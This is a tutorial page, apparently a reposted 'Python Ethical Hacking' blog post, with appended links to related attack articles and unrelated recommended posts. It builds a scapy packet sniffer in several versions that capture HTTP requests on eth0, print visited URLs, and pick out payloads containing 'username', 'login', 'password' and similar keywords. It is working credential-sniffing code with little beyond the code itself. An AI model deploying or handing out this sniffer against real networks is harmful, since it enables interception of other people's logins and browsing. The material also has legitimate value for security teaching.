PACKET_SNIFFER

  • Capture data flowing through an interface.
  • Filter this data.
  • Display Interesting information such as:
    • Login info(username&password).
    • Visited websites.
    • Images.
    • ...etc

PACKET_SNIFFER

CAPTURE & FILTER DATA

  • scapy has a sniffer function.
  • Can capture data sent to/from iface.
  • Can call a function specified in prn on each packet.

Install the third party package.

pip install scapy_http

1. Write the Python to sniff all the Raw packets.

#!/usr/bin/env python

from scapy.all import *

from scapy.layers.http import *

def sniff(interface):

    scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)

def process_sniffed_packet(packet):

    if packet.haslayer(HTTPRequest):

        if packet.haslayer(scapy.all.Raw):

            print(packet.show())

sniff("eth0")

Execute the script and sniff the packets on eth0.

2. Filter the useful packets

#!/usr/bin/env python

from scapy.all import *

from scapy.layers.http import *

def sniff(interface):

    scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)

def process_sniffed_packet(packet):

    if packet.haslayer(HTTPRequest):

        if packet.haslayer(scapy.all.Raw):

            print(packet[scapy.all.Raw].load)

sniff("eth0")

Execute the script and sniff the packets on eth0.

Rewrite the Python Script to filter the keywords.

#!/usr/bin/env python

from scapy.all import *

from scapy.layers.http import *

def sniff(interface):

    scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)

def process_sniffed_packet(packet):

    if packet.haslayer(HTTPRequest):

        if packet.haslayer(scapy.all.Raw):

            load = packet[scapy.all.Raw].load.decode(errors='ignore')

            keywords = ["username", "user", "login", "password", "pass"]

            for keyword in keywords:

                if keyword in load:

                    print(load)

                    break

sniff("eth0")

Add the feature - Extracting URL

#!/usr/bin/env python

from scapy.all import *

from scapy.layers.http import *

def sniff(interface):

    scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)

def process_sniffed_packet(packet):

    if packet.haslayer(HTTPRequest):

        url = packet[HTTPRequest].Host + packet[HTTPRequest].Path

        print(url)

        if packet.haslayer(scapy.all.Raw):

            load = packet[scapy.all.Raw].load.decode(errors='ignore')

            keywords = ["username", "user", "login", "password", "pass"]

            for keyword in keywords:

                if keyword in load:

                    print(load)

                    break

sniff("eth0")

Python Ethical Hacking - Packet Sniffer(1)的更多相关文章

  1. Python Ethical Hacking - Packet Sniffer(2)

     Capturing passwords from any computer connected to the same network.  ARP_SPOOF + PACKET_SNIFFER Ta ...

  2. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  3. Python Ethical Hacking - NETWORK_SCANNER(1)

    NETWORK_SCANNER Discover all devices on the network. Display their IP address. Display their MAC add ...

  4. Python Ethical Hacking - Bypass HTTPS(1)

    HTTPS: Problem: Data in HTTP is sent as plain text. A MITM can read and edit requests and responses. ...

  5. Python Ethical Hacking - BeEF Framework(1)

    Browser Exploitation Framework. Allows us to launch a number of attacks on a hooked target. Targets ...

  6. Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(3)

    Recalculating Content-Length: #!/usr/bin/env python import re from netfilterqueue import NetfilterQu ...

  7. Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(2)

    MODIFYING DATA IN HTTP LAYER Edit requests/responses. Replace download requests. Inject code(html/Ja ...

  8. Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(1)

    MODIFYING DATA IN HTTP LAYER Edit requests/responses. Replace download requests. Inject code(html/Ja ...

  9. Python Ethical Hacking - DNS Spoofing

    What is DNS Spoofing Sniff the DNSRR packet and show on the terminal. #!/usr/bin/env python from net ...

随机推荐

  1. Java 多线程基础(六)线程等待与唤醒

    Java 多线程基础(六)线程等待与唤醒 遇到这样一个场景,当某线程里面的逻辑需要等待异步处理结果返回后才能继续执行.或者说想要把一个异步的操作封装成一个同步的过程.这里就用到了线程等待唤醒机制. 一 ...

  2. deepin双屏实现方式

    先xrandr --listproviders看下有几个provider,如果有多个,那么可能是不同显示口在不同显卡上,运行xrandr --setprovideroutputsource 0 1或x ...

  3. 深入理解JVM(③)虚拟机性能监控、故障处理工具

    前言 JDK的bin目录中有一系列的小工具,除了java.exe.javac.exe这两个编译和运行Java程序外,还有打包.部署.签名.调试.监控.运维等各种场景都会用到这些小工具. 这些工具根据软 ...

  4. 虚拟机 VMware 设置VMWARE通过桥接方式使用主机无线网卡上网

    环境:WIN7旗舰版,台式机,U盘无线上网卡. 虚拟软件:VMware9.0,虚拟系统:CentOS6.4 需要实现虚拟机以独立机形式工作和上网. 先介绍一下VMware网络设置的三种方式 1 Hos ...

  5. struct2面试准备

    二 工作流程1.客户端浏览器发出HTTP请求.2.根据web.xml配置,该请求被FilterDispatcher接收3.根据struts.xml配置,找到需要调用的Action类和方法, 并通过Io ...

  6. Python 简明教程 --- 17,Python 模块与包

    微信公众号:码农充电站pro 个人主页:https://codeshellme.github.io 正确的判断来源于经验,然而经验来源于错误的判断. -- Fred Brooks 目录 我们已经知道函 ...

  7. C#数据结构与算法系列(十九):选择排序算法(SelectSort)

    1.介绍 选择排序算法属于内部排序算法,是从欲排序的数据中,按指定的规则选出某一元素,再依规定交换位置达到排序的目的 时间复杂度:O(n^2) 双层for 2.思想 选择排序(select sorti ...

  8. 入门大数据---Spark整体复习

    一. Spark简介 1.1 前言 Apache Spark是一个基于内存的计算框架,它是Scala语言开发的,而且提供了一站式解决方案,提供了包括内存计算(Spark Core),流式计算(Spar ...

  9. zabbix4.4安装

    本安装操作系统为centos7.5. 安装前准备: 1.1 安装依赖包: yum -y install wget net-snmp-devel OpenIPMI-devel httpd openssl ...

  10. Flask项目实战:创建电影网站-创世纪(1)

    以后要养成写博客的习惯,用来做笔记.本人看的东西很多很杂,但因为工作中很少涉及,造成看了之后就忘,或者看了就看了,但是没有融入的自己的知识体系里面. 写博客一方面是做记录,一方面是给这段时间业余学习的 ...